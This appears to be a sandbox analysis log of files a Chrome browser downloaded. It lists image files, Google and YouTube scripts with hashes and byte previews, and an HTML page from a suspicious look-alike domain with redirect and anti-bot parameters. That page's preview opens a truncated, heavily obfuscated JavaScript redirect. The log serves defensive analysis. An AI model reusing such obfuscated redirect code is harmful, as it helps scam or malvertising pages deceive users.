                                                                                                                                                                                          SHA-256:C94A17195ACB39710B2A86A4E230B4C474919B9D722B3C7749CA97BDC3D9ED9C
                                                                                                                                                                                          SHA-512:059BB53BB3D3F958F8CDA39F94D23BFC2E78BF15E5C8479553119F6F0FECE3BE2AA46762C0496A48566A4CDEBB5831AF8057A3A109C0D1BAAD2882818ED2DB21
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........6..................................................................]..../....n.m.D...s!..d.5)....#l.0dd..q..p......;....x..\.!z."IVVU................vW*......y....M.... ........G\r@u....Tq......).W.e).;Fb.7....l....x.}.....u......zE..T.(...r.)j6...^..7.......m..qq..~.s'(Bk...yf..g...|.w'.."u....;.[......6".&..szi.y.E...........kQ..m...Gz.#..J..=v.G$>'..........sF.r.~5....1kpw8}>8../m.....5..x?..],]{]..z....=...R.r.....9K.-.J."Ov.!.7.v4[hA=e....d.f>....n).y'.=/.oR.z..<.:.x..b..}.......Kh.{.t.6.X2..h.Db.....?E+j.D.U.:......4.;\...8......6......J..I...?n..I..].t..4...Z.f..T../G|.MF0...w.bM.*I9N..m.g,....~A.uiN...u.....V}D2.9H.I{....L.?7+..Y..l.C....8....Iz.py..[......J....n...R...bE.z...qs{...f.Y.K..]#C...9..w.%.z_7.rE.m....a..e.....XZ.s..c.c.M...n.aQ{.-....W>L........
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x450, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):12690
                                                                                                                                                                                          Entropy (8bit):7.922740575653427
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:ALv+tgtJ+AAmhGbYKoTs0LRhqFgAtM//0hYBTdVMbDfvn7ho6/UyxkQqLGllYVIc:i+tg7+AvhuZ4RISXHOBbLto68yqLGgL
                                                                                                                                                                                          MD5:3A8CF1978813EC1A3BBF4C8A0349BEF1
                                                                                                                                                                                          SHA1:8BD7736CA94118044FF5CA9807F336DEB945CA71
                                                                                                                                                                                          SHA-256:BF8C9E0EF750773F1652D7CCA534BB06D0CB7487CC0957F75BFFF8288CF054D8
                                                                                                                                                                                          SHA-512:0C743ACBF526B87B6A909FFB5C18C37559BC5EB14C373D8480A3BA1FB9F4A4C98B9097A063C77687388AE35341170EA77CC64613DB7D32A7CB8B815BF89B2E53
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........3...................................................................K-)e.aaPZT....(.V.:.ZT....\K...ZV.*...=...eE......................D....p[..9..e..MvK..N.....9..:....g3.N..4+.K....OTz..p.9.2.G$.qt...p'.........)..p...X.A..xaU..Zv..V.0!..3-..[.p...........D....l'.....L..@....4!.......L....uVD..@ c..P.......... .1.@.P............y...o.lS.B1,1.U.f,}!.o.WHqu....F.@.).Gfbf`..V..4.>......w..3.29....g..~dI~..~|.R..3..A.I.............:.[G_.....k8.F.y/Y.s=....m..-....i.q...u.........Bqf......lcHa..e.......NA..s[m.P.........$z.5...........^'K.c...{OU.37..5.}W._......l.O....t.&AL M..A.a..&..V...l.9.;...c..z.G:...:...H....W.....z.[.....s...J|.|H.......!X.....-b.[..k..>..<......9%fg..n?.Z.:.v......k.>`.....o..3.3g..Jq..$~.....lpV..[.JEd......LH....../.}3..}.l..............Ls..../.<..
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x433, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):24634
                                                                                                                                                                                          Entropy (8bit):7.968460019889492
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:7MaYUZMjf5vRFx54KdhWnTMpY32lsc6eqHeGX:Qzf5DxWK+nApY3WE/HeGX
                                                                                                                                                                                          MD5:E6386AB927D99700F6C5250DDB64FF5D
                                                                                                                                                                                          SHA1:A026A75D2FFA766CF617C4D37283B6A043624DF5
                                                                                                                                                                                          SHA-256:8B03CEFF02EC9097FD9EFE3939B6EE13885FABF5BF85BF9E4B99B10620ADD136
                                                                                                                                                                                          SHA-512:9452FEF29189673040924CBE5FA9027A655C44A229A8C336F03772787AE925A4C338D28375346C718B5411C769283A00E6ED08069911E26A574A6BC39DA9697D
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BNDA2Y2EyNjMtNmJmOS00NjU2LWIxNTQtMzNiYmY1ZDZlZDY5XkEyXkFqcGc@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5..................................................................G..z....y.R.u{.Ke.-..pu....bG..U$.6oT.Jj..W..;.h.~.m&..O..De.I.3........9..H..........:..d..Yy.W..[A.}....-!....[...F4.u../..F.|...".+....r0....;...........g..S")..~.........o...#..q...ya..*V+9Ze....>..8.].:xnq...A4.{.-..[w+.]#..y2H.Vi.Gh.\....6.^.ip.....DDs#s.~H....l..@...+,.....I...T..p.....G....^^...tm.......J.O...O\.S.j.D...-a....d..c9Z5.`^.>.L..~h....Jp...v?../J.`?....Y,.&-.G.Dn.......[..2f..7.....8|.B..6..Uy...+...U..k..ez}d..c.N4..6;....X....vj......j@{0.~.......r=.k.X..^..x.\.u.Oz-.B...MN...M,wBK.}..K.\..$..+G....../..T.-...{.`mch.!..w)^j.....Ppk+..(.S_.A=.....6a)...b..X..M..5..4..-...C.DL#3..1...........n[1-....H...tp.o*..g.y....J_J..pmK...D.H..%G..c....!...]..m9vH.&....^..+...:....U.C.........W..FN.o~.....
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x447, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):37034
                                                                                                                                                                                          Entropy (8bit):7.968965939804151
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:XXN/RTEky0eDiuKjaEaW8kN0FWqqsNe/4fw7z6aSzV2iK4X/:Xd/R4P/iHrarFWaw/Cez+Y6
                                                                                                                                                                                          MD5:45BFB22FB4F1B4DE244A71542628A914
                                                                                                                                                                                          SHA1:C15E79B181E6D53F7E54AC74898129D01DCD53A8
                                                                                                                                                                                          SHA-256:76047340F344D3CFF21B041977A7957D1B02D7A6BC34B6CCC74BFCD69B043E43
                                                                                                                                                                                          SHA-512:2E6942D16BB2190E240E2C3F9D7BEF8C2C4A2B3C27E452B885B732FCCE2C7CF1DF4723C0EC8783ADC93ED520AB400E8BCF928FE801AE0FFB22BCCE3A1924C3BC
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BNzljYzQyNTMtNTdmZC00ZTM2LWJjN2YtMDNiOGI4Nzg1NThkXkEyXkFqcGdeQXVyNzc5MjA3OA@@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5....................................................................g..y....g..{..f`ff........m....k.....g....g..g..6..f..86...1h....e..M..5...W..[..5[.w.$Q...VT...:a).w..Ql......./.=[n./5e.Kk.pc.R)....W.Svc..Kep.Jc."z.,T....3l..d.:....k.9..o.F..wr.x...Qy.8.E.E..}6/[#..B.7cC........npfL..D.\s...4...Q+..l..Z.M..v..z.t.9.w...T.+Obo......Yk.l......!QIw9...;w...t._....L.mC..R.rb.....Yk.m...P..j.............r2.6..e..U...p!|....Ko..Bx]rb....x.t...@..U.ph@."lW........'J.l.;........U:'..p.l.q.q......y.d/E...+"Nut..f(4.n.........y...c,8..H.\.y.d..=Ye.#d..!.sD.a..'..'h..R.]:.3.-.<.Ks.'c.O./I1ni...;..|..4mW..8sO...g..9..:A..e......vg"..}a.o=..e^...D...>..baR..Xgg.>.&..o.....y..%.T3mro./.3pG.../.[.k..[...vO.D......+R.)l...M.JA.T....0J..8.y.m.O....g.....7.;..2.i.....lP......s7#...
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x446, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):25520
                                                                                                                                                                                          Entropy (8bit):7.978205599989589
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:THPj95ZhXo8vIxBktmPx7mvM9E7vp2oZEbo:7PB5Y8vIxBk4Ju7R2uEc
                                                                                                                                                                                          MD5:3C385031DAC4E30482C763C892EF4EC4
                                                                                                                                                                                          SHA1:A87AF5BB2699A75E5C1A8AD54317FF60E6BC33CD
                                                                                                                                                                                          SHA-256:FC4419F92C05FCFCD077CB31F152E4AF0C3CF180BE3D69AFE703F449A8575520
                                                                                                                                                                                          SHA-512:5A1FCCAEB941A8EC2445B121CC69A01FEFAEDBA0E974A6E9F77916BD87CC8942BA1185300315D03FC51901CB76B3766521C3878ED3F9E4B5F3FDBF73E6DA8FF5
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BYTYxNGMyZTYtMjE3MS00MzNjLWFjNmYtMDk3N2FmM2JiM2M1XkEyXkFqcGdeQXVyNjY5NDU4NzI@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5....................................................................._....3.S.......gSq'..+P...^'..F....k3.`_[.>.r..%.+...dN..D.T........>...V.EQ..eUYR.+%.K.....MC..o.b..u.T.o2.....X.:..A.Q..3.A.}...a<m.N..6........+.r$;(.Bu...l....z..7...../...t._.....M.....E*.=.......5...+......U...c..|k....?..M.B...F..-M0..tk2.^v......c.&Gy.N.V..e&3ii.&....c,.....z:."....vx.....w.......8.o..=.?...i.OK.h&.Q..#.......7.N{{.^....<..;.f,..x',..R.k..)..u.....+...........v..z...tl..f..'..7..M~<n....\.y....r?Y9GStb.....\..T.n.u.t...6...v.h..2.:.....j83a.....y..t......?..c|.)......4Rg.....%_....AT.;b.>.t9:Y...ZZu.Gf......G;.'...n..2'..n##``..O...b....nf{.N.1.W.j..c,...c.Le.`.Q.Q.J.v.L"..'[B.7...@.Z..C`.h.R.;.....as..R0.\6..E?....... .^....!&...1G..S;.......T.[.n.z.\.XV.Y.d..V.Z...akU....W..<.k...
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x472, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):21446
                                                                                                                                                                                          Entropy (8bit):7.969063436064
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:miy0MWgwf4afuHyojGd9PdHS6G805n62FEIDSWgRs5NWTWM4YT:miBMWgwQabojGHPdHq80wMJuWksva9
                                                                                                                                                                                          MD5:2766F764162135FE1E5460D297207F42
                                                                                                                                                                                          SHA1:F9FB3CD2DCE579BB3178DC4F8A08A608EC4B89D4
                                                                                                                                                                                          SHA-256:198AD71A04EC8D07B7F3D155836CED007C8C9D869A5D84D8C06CF8E6AEF5D3C4
                                                                                                                                                                                          SHA-512:E0631471C54AFBFCC0B213756D2F39992B716ABE386403B534174BC7DC853540E700E47C9DEEA2D0E1B69E60527D2A74A2E71204C0C39F25CE9952D08F89B7C7
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5...................................................................3l...[aA....j......a.z....}.^>..FWj,..ls._...S.-...Ly..!..4. l...............[.{V.h...>.v.k.h....?.....Tk..o.]....9.#y.*;..z.1.;R..4m...........%.fgL...K..vU6...AJ.}{....c.M_...yQ.7....>+i3*.........K..a..S....[%'4...DhmDt(.T.].I.3j\......Z.......y>.W....c."h.;|.)}..m.C..M.x[....,Y..!........P...!C..M..U..iz..I.)'.O.......:...5.u..&.......C.GU.$....-.\..X.y...r...~so..^s.g.....$...=;w..HW..l.a....G.....Mv.E.%A]..<.U.....:d..DE@..k)..9.r...>.......D.7....`..7....HX...=....@.J.v.kc/K.^....F.0.V...zs.W(1Q.7...|..J\g..q..T..N4).*#..{......\.'......}7>Z...q\..r...IE...mkC.7.'v...e........./.v.[.....K...b....4..c2..c.4T..=\.8.#...?c.S....).X~UF..r..TR\.tv.:9..F....esg7....d...Q.(!..._...j...z...,P.]k.....y1..b{...
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x452, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):38638
                                                                                                                                                                                          Entropy (8bit):7.982041582324482
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:JtgNm0v8VmoNLEvThHlPUHoYoYprLFt7gn5kZTaI/t653jqNHpb8d808sj4gM:Jgn8UvvThFPU0YprLFlgnStaIA53+HpX
                                                                                                                                                                                          MD5:79854B06EC54FFED0E1274C3D6142366
                                                                                                                                                                                          SHA1:AAD8DB7B4FE281D450D3620F19567614883FB6D2
                                                                                                                                                                                          SHA-256:F0FA247A6AACC5F22DBBBFCC65AA17C98FA372BC778597B285C8846571E03A2E
                                                                                                                                                                                          SHA-512:B75AF36CF54A7973F64C00874B4F468B23415E98A2773993FA5C0F979108D1169E39FCA3A1FE5DBAC3906B1773C1FF2CDFE86A00D5B00497E66A3B03E27D3045
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BY2M1ZTA0MTItZWNhYS00ZDAxLWIyMDQtMzIxNDg2N2NhYjcwXkEyXkFqcGc@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5..................................................................I.Y^.....B.W...m.\.p...nb....`....."B...$B-.D(.._.VSIV.]..h:x3..27.3.IZ........1.Lb...>.d$9......#@..a.#$.>....h,...O+.[...`...:Gz..Sp.l0<.?.R)...!.f..(.,.zm3....'..W...;...AX..=3.ekir...:%..'..]...Y.n...3...C.....j..ld...$n..........s...%.d.....32y}-2..=...#.f..[....U%I....,*LTg.0..-&..`.t.....q..O[.3...... .P......P.]O8.|....v.....O~.l.J.....e.MhY5...dB.Z..9...)...\.."...z..7...f.8..T.n.z..Iu..KY....8)...1./..?.-.9..W>.D{\...6Y.h$..".k...r.k.Vv.B..$..g.....=s.Cn...i.9ZU..+.'mw9...k.-...+R..^>..=........).N..n..K..l...?.un.J.h,.U..(O....O;xs2~.Q..:..1.k....7.r.....M.....Y.Z&zm..o.....CY..gb.{6..k.....Z.t.N..#....ZXb.....".&....r.<....w.........9.<wZB...X..Z.=.p........=A.zU..{.[r.e.d...K#.V.....5\.x.i.xh.<..E...
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (12811)
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):12902
                                                                                                                                                                                          Entropy (8bit):5.706218592917667
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:w0bJEGL45Mg6sWmgjxICa88mpGNZmxhqXmNtTLxbX:qGMSq588mXhbNr
                                                                                                                                                                                          MD5:5C75E980492E8074E008AE2281FB39B9
                                                                                                                                                                                          SHA1:7353537A9F909604AB992F58D03905BFBA1E7E8E
                                                                                                                                                                                          SHA-256:2497926F27FEFC3DA9E76A4C4DB826DFF23BF70D5208B59850684007FF1D6831
                                                                                                                                                                                          SHA-512:F51B955D68DB99D0416224B21694A013E933752ECD3D41671BFB88A72EA1C08D8376674352EAC36F638EA2E7F5786EE9F353413BBFCF7330C795726525D3D08E
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://lgzmq.employmehnt.com/UARUK?tag_id=1092278&sub_id1=&sub_id2=7644300386026765877&cookie_id=8dbdac19-33de-4295-8d02-4ac9205c776a&lp=not_robot_3&tb=redirect&allb=redirect&ob=redirect&href=https%3A%2F%2Fgetrunkhomuto.info%2F%3Ftid%3D1092278%26noocp%3D1&hop=7&geo=US
                                                                                                                                                                                          Preview:<head>..</head>.<body>. replaceOutbrainPolicy-->.<script>B977(typeof window===typeof{}?window:typeof global===typeof{}?global:this);function B977(){function m3(){var J9=2;for(;J9!==5;){switch(J9){case 2:var t9=[arguments];return t9[0][0].Array;break;}}}function e3(){var V9=2;for(;V9!==5;){switch(V9){case 2:var Q9=[arguments];return Q9[0][0];break;}}}var G9=2;for(;G9!==85;){switch(G9){case 64:a9[43]+=a9[51];a9[43]+=a9[51];a9[45]=a9[67];G9=61;break;case 42:a9[90]+=a9[16];a9[90]+=a9[51];a9[81]=a9[4];G9=39;break;case 44:a9[65]=0;a9[90]=a9[57];G9=42;break;case 39:a9[81]+=a9[62];a9[81]+=a9[3];a9[38]=a9[23];G9=36;break;case 11:a9[53]="o9";a9[7]="tr";a9[5]="";a9[5]="__abs";G9=18;break;case 36:a9[38]+=a9[61];a9[38]+=a9[8];a9[29]=a9[20];G9=52;break;case 31:a9[16]="97";a9[57]="z";a9[97]=4;a9[97]=1;G9=44;break;case 61:a9[45]+=a9[16];a9[45]+=a9[51];a9[25]=a9[23];G9=58;break;case 55:a9[64]+=a9[51];a9[64]+=a9[51];a9[14]=a9[6];G9=75;break;case 58:a9[25]+=a9[30];a9[25]+=a9[1];a9[64]=a9[36];G9=55;bre
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):73320
                                                                                                                                                                                          Entropy (8bit):6.023930305985183
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:HmMxGD7GlXw+mOIdTEYGNcRUNz0ZsfGXdcxpOtfL97P9gXum7/5kxV2:roD6hzmuYnRGxozdP9g+mjAV2
                                                                                                                                                                                          MD5:4D6390BF4A8F17CD24A40B973C9CA436
                                                                                                                                                                                          SHA1:00F0CF3B59F4E4E7245106FBA3BA10B0605E41E2
                                                                                                                                                                                          SHA-256:93E190093C4A6ED934E21901641A4140281E0186F0BDE73BEAA43259A23E7711
                                                                                                                                                                                          SHA-512:8B6B87E745ABA19E262CD9EBE56CA5A135811684A382FC274A3CB3F253F7059810DDA23DD9D368CCE8AC633DE7D9C8E83580879E1080B681AF6B5A72AD542376
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://www.google.com/async/ddljson?async=ntp:2
                                                                                                                                                                                          Preview:)]}'.{"ddljson":{"accessibility_description":"","alt_text":"Seasonal Holidays 2024","dark_data_uri":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAlgAAAD6CAMAAABK88kiAAADAFBMVEVHcEyQ+f/+sZLpsOD65JP9ew7lnun943b3PjryTED+krT683n/ODb9lr7/NjP9bIDejvz/mLz+krP/iqj/sNz/tOL8m8r+ZXbZivzci/r/Mi3/eJD/hKH/nNX8W2n/NTL8XWzbjP4P/Oj9ODb6XXn/My/5OTjCZXX4WnW2WW8D++H7S3T+TF/7NDHWVH38ZZnmY6y2WJLyYqv+WEj+ca/7XqD6Mi0F7OX4MiyqS0ycVmEM8OYA7f8A8eUE4fv+QEIB7v8A6fv7Lif8MCoD9d/9NDAJ8NacSkkI6uoH7eKTT0z6Lyf+QYHsQDbGPT+wQUHdNDFiYWP+LCVhXFxcWlpgWl0ugPoLR+pbW1pbWltdW15OVn5fYF1cXVz7LCVcXFxFR5oNQuMLPe1PXVwwQbQQPvsue/QKOvD9Licyhvgug/gAbOY1hPgE7dUA2+oAy+UAnen+50r97Fj+6lD961k0hvgsg/stg/pdZ14A8f8A2PH/6Uv97Vb/7U/+7VIvgfctg/sH9tD95kv+6k/ZzFRmV1QA/sX85EqHg1qmlUj33UIHpUkBrEgFp0x6dFUAI+Nzfolwe3KQnbBdWVxeX1+xTk+z/+Gdx86s4ez88WiJTU1pbmqEoKW05/qk9NG16PwBsUav/N4axCkQfj16UU91KXqNQJgVgUAFsWg/PM37vhB7VG37uQ/8wA7+uwH5vxGen3r7gNb/gtrZi//7vRCw/eDVsStAqOw3jfnz+p0+rO7ld9xEo+rbi/7TavjVffPNL/2cTa6nbsrbi/6eXbIyh/tqjvpvjf7+Tay1qFNxivx1kP9Tif2Vj
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (501)
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):993
                                                                                                                                                                                          Entropy (8bit):5.289915108457373
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:E1WXIbtEHvIYWwmqAK/HJ2cNAXzk5vuHM8aJLtMCRWZ4FhQ:E1WXmtEPT6cLAXzk5kaJL+CwYhQ
                                                                                                                                                                                          MD5:412EA828C68BC97BCDEAA7B7E9B41C61
                                                                                                                                                                                          SHA1:F67ED2E0224E9C54ABA069B483DA15E81078FEBD
                                                                                                                                                                                          SHA-256:F8D1544BB47C74EF9A9B177A721C628AEFF0BE0F9F6A57B18769A7D67055C759
                                                                                                                                                                                          SHA-512:365C069834C20523B04A46E3CB3FF57DD31962D2129FB930AEE8C73E2CC626E7BC83E9BF8E448E1FCE81FCA900A6E6CA3A43F1F8F8D254B567FEBC8F61C83FC1
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://www.youtube.com/iframe_api
                                                                                                                                                                                          Preview:var scriptUrl = 'https:\/\/www.youtube.com\/s\/player\/f8f53e1a\/www-widgetapi.vflset\/www-widgetapi.js';try{var ttPolicy=window.trustedTypes.createPolicy("youtube-widget-api",{createScriptURL:function(x){return x}});scriptUrl=ttPolicy.createScriptURL(scriptUrl)}catch(e){}var YT;if(!window["YT"])YT={loading:0,loaded:0};var YTConfig;if(!window["YTConfig"])YTConfig={"host":"https://www.youtube.com"};.if(!YT.loading){YT.loading=1;(function(){var l=[];YT.ready=function(f){if(YT.loaded)f();else l.push(f)};window.onYTReady=function(){YT.loaded=1;var i=0;for(;i<l.length;i++)try{l[i]()}catch(e){}};YT.setConfig=function(c){var k;for(k in c)if(c.hasOwnProperty(k))YTConfig[k]=c[k]};var a=document.createElement("script");a.type="text/javascript";a.id="www-widgetapi-script";a.src=scriptUrl;a.async=true;var c=document.currentScript;if(c){var n=c.nonce||c.getAttribute("nonce");if(n)a.setAttribute("nonce",.n)}var b=document.getElementsByTagName("script")[0];b.parentNode.insertBefore(a,b)})()};.
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x458, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):33709
                                                                                                                                                                                          Entropy (8bit):7.986079300234609
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:7poVoSvDJNDkifWby/8/gaJpT/VKEgl4FNxIsUkJ:VoVNJNfOba8FVBO4ZIsF
                                                                                                                                                                                          MD5:CC622E4E5B1CCAA0C2060CACCC57E642
                                                                                                                                                                                          SHA1:72E68AC807F16CDD47FAF8DB758C5F9E529943A1
                                                                                                                                                                                          SHA-256:1953FE28C3A44D1407E1E9A99330E7FAFD48676E178B7D4911BCCBC44F4EE0CC
                                                                                                                                                                                          SHA-512:00CCA7D3B5B7D5361B25C437D8520E5AAA8B4E10CB6AC247F25827BAD7009A980DC21322450571819E6B8BA7751FBF29DE272DDB2E2BA3E35AEA81AE22F45CFF
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........6....................................................................n.c...<.z...J.d.,.,9..f=.s.Xs.....0./...h.<w....Z:...%.L..._....w}.....O..... ..VQ....~Y...(.Y..U.>9...^M.dB.^$..."s.kC.S.0..Tab...JL.......xe...&.4t......Ok....[...=..t.#..-....._.....+.P..Bn.~..Y..........B.i.T..#...Y........H...i.i..R....4.3M3.+.s.L..5&.......D.<W#..v.|... ZQ.....O....z........@h..lJm...8.Ak...A.....a.P`W.....sS.y.......5....N.'|..$.......l .0...%.bX...-)L#..z@;...}...2.P..,......L.p..3.G..@m6Y........1...^,.Z.@.N.Bf3w.1.c+.$....8u......u..<..D>...,51...|...a.2.3".+.m..:...(.].Q....!....S..`..e..&[F._.d....y.4...:......Tk....Lj.....n.........Q\xaU...}V./.S,ol.p.W..=B..D....)^.. . ..B.<........w.....+....g(d..d..)Q.xpx)..SM....`b.....fi>....4.1.?.^p"..n>.{.k*...0. a.&S...[
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 1x1, segment length 16, baseline, precision 8, 254x475, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):36109
                                                                                                                                                                                          Entropy (8bit):7.931520315156774
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:LVa+O91H2YS4gecJKREQOKkdhceAnn2zU9RFKFCwD9wZ:L0+OL3gecaEXKczinxVcxw
                                                                                                                                                                                          MD5:8DD761771B9879A4777B17E6D84B69CC
                                                                                                                                                                                          SHA1:E6A3A21BA8503A5D28D715CC22DF1A6FAD59E7D7
                                                                                                                                                                                          SHA-256:5C16DDD168BAE440CC8DE47CDE210D3990E69737FCEDDF06694F906B566DD704
                                                                                                                                                                                          SHA-512:3926887D669D7F3B97570BB7ED3C98385EFB842CF8FF98E312BEFA5D6191F86CBFD245297553F30763DCC6DB0D9B9A8CE8084B72BCE4538B24B00DC0EFC90B81
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."........................................K.......................!..1.AQ.a"q......#2.....$B..345T.DRbr...%dt.&s....................................2........................!1.."AQ.a#2q........3..R............?..5.F.j.M..P.......G...Q...%$....$.....@..17.....EH%E ....F$I..5....G..+..5=@........~u...I......|s]..P......1..s..e...-]^(.JI.X.@LL...P...) .q..SZ|4...ki..iI..?S.Wc....,.^...F.AYJ...`.'.1.....M..:(.|./.7....8@...T.=..Z.}..J.B....$.........C}... ....m"A0.s2N.....;...b..4.._.nR\.U.w$.G.$.}.....c..t.t.-V.`........#;`.zF..w~....N..... ..J....f..7i.}.iN.....R]q(QJ......i.P,...ii......,w.^...=yq.Z!.PT....N{P.t...X.-4.)......;.`)Q.q.]M......*.u.| .O |.P...V.6..R..CO2.... d..S.....*.y;.e...#...Zj....2..P.Je$.P&..T}M...M..Mh.j...).....#>.:..zc....-)....P.e2;.9.....g..7.+..nz......I.3..(.0L...
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x452, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):31011
                                                                                                                                                                                          Entropy (8bit):7.981344408001238
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:VhOsiGAHd8Nzr1JwBmPHMrib9z9qZUHHytEWhIy:VEsi7HdKzrSeHMr85zXy
                                                                                                                                                                                          MD5:9809780350FE191D2DCA1A904A5BF73D
                                                                                                                                                                                          SHA1:00C2154765664EA57565974C74A46A68F98497FA
                                                                                                                                                                                          SHA-256:12770624F7D9C7737470860B585BC8A1833FAD45647A8211BC9273672F77AB02
                                                                                                                                                                                          SHA-512:075252A2ADE8C9A5C23E93A494D28FF4872ACC58569C0ADBDD2DDD3C793AC89A883AE5DFA7AB1D399EA9D4F2443E682591787BCF933799866C9E3DC28832816F
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
